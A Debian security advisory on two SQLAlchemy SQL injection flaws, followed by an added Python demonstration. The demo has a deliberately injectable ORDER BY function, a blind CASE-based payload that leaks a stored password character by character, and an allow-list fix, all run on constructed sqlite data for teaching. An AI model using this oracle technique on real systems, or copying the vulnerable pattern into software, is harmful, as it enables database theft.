ELA-105-1 sqlalchemy security update

SQL Injection

2019-04-10
Package sqlalchemy
Version 0.7.8-1+deb7u1
Related CVEs CVE-2019-7164 CVE-2019-7548


Two vulnerabilities were discovered in SQLAlchemy, a Python SQL Toolkit and Object Relational Mapper.

CVE-2019-7164

SQLAlchemy allows SQL Injection via the order_by parameter.

CVE-2019-7548

SQLAlchemy allows SQL Injection when the group_by parameter can be controlled.

The SQLAlchemy project warns that these security fixes break the seldom-used text coercion feature, that is, passing a plain string where a column expression is expected and having it silently treated as raw SQL text. Code that relied on this behaviour should pass column objects instead, or wrap vetted SQL in text() explicitly.
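The root cause behind both CVEs is the same: a caller-controlled string that ends up verbatim in an ORDER BY or GROUP BY clause, where it cannot be protected by bind parameters because it names an identifier rather than a value. The following is an added illustration, not code from the advisory or from the SQLAlchemy project. It uses the standard-library sqlite3 module instead of SQLAlchemy so that it runs without extra packages; the table, rows and the allow-list of sortable columns are constructed for the example. The "vulnerable" function mirrors what pre-fix query.order_by(user_string) did (string coerced to raw SQL), the blind oracle shows why that is exploitable even when the driver refuses stacked statements, and the "hardened" function shows the allow-list pattern that remains the correct fix regardless of library version.

```python
"""Added example: raw-text ORDER BY injection and the allow-list fix.

Illustrates the class of bug fixed by CVE-2019-7164 (order_by) and
CVE-2019-7548 (group_by). Uses sqlite3 so it is self-contained; all
data below is constructed for the demonstration.
"""
import sqlite3
import string

# Columns a caller is permitted to sort or group by (hypothetical allow-list).
ALLOWED_SORT_COLUMNS = frozenset({"id", "username", "created"})


def make_db():
    """Create an in-memory table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "created INTEGER, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            (1, "alice", 300, "s3cret"),
            (2, "bob", 100, "hunter2"),
            (3, "carol", 200, "letmein"),
        ],
    )
    return conn


def list_users_vulnerable(conn, order_by):
    """Mirrors pre-fix behaviour: the sort key string becomes raw SQL text.

    ORDER BY cannot take a bind parameter for the column, so an
    attacker-supplied string is spliced straight into the statement.
    """
    rows = conn.execute(
        f"SELECT id, username FROM users ORDER BY {order_by}"
    ).fetchall()
    return [username for _, username in rows]


def list_users_hardened(conn, order_by, descending=False):
    """Only identifiers from the allow-list reach the statement.

    This is the same idea as passing a column object to SQLAlchemy's
    order_by() rather than a string: the caller picks *which* column,
    never *what SQL* runs.
    """
    if order_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    direction = "DESC" if descending else "ASC"
    rows = conn.execute(
        f"SELECT id, username FROM users ORDER BY {order_by} {direction}"
    ).fetchall()
    return [username for _, username in rows]


def oracle_password_prefix(conn, prefix):
    """Blind inference through the vulnerable sort key.

    No stacked statements are needed: the CASE expression flips the sort
    direction depending on a condition about data the attacker cannot
    read directly, and the first row returned leaks the answer.
    """
    payload = (
        "(CASE WHEN (SELECT password FROM users WHERE id = 1) "
        f"LIKE '{prefix}%' THEN id ELSE -id END)"
    )
    return list_users_vulnerable(conn, payload)[0] == "alice"


def recover_first_char(conn):
    """Walk the alphabet with the oracle to recover one character.

    SQLite's LIKE is case-insensitive for ASCII, so lowercase suffices.
    """
    for ch in string.ascii_lowercase + string.digits:
        if oracle_password_prefix(conn, ch):
            return ch
    return None


if __name__ == "__main__":
    db = make_db()
    print("plain sort:", list_users_vulnerable(db, "username"))
    print("leaked first char of alice's password:", recover_first_char(db))
    try:
        list_users_hardened(db, "(CASE WHEN 1=1 THEN id ELSE -id END)")
    except ValueError as exc:
        print("hardened path rejected payload:", exc)
```

The oracle needs no multi-statement support and no error messages, which is why "the driver only runs one statement" is not a mitigation for this class of bug; restricting the sort or group key to known column identifiers is.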



For Debian 7 Wheezy, these problems have been fixed in version 0.7.8-1+deb7u1.

We recommend that you upgrade your sqlalchemy packages.

Further information about Extended LTS security advisories can be found in the dedicated section of our website.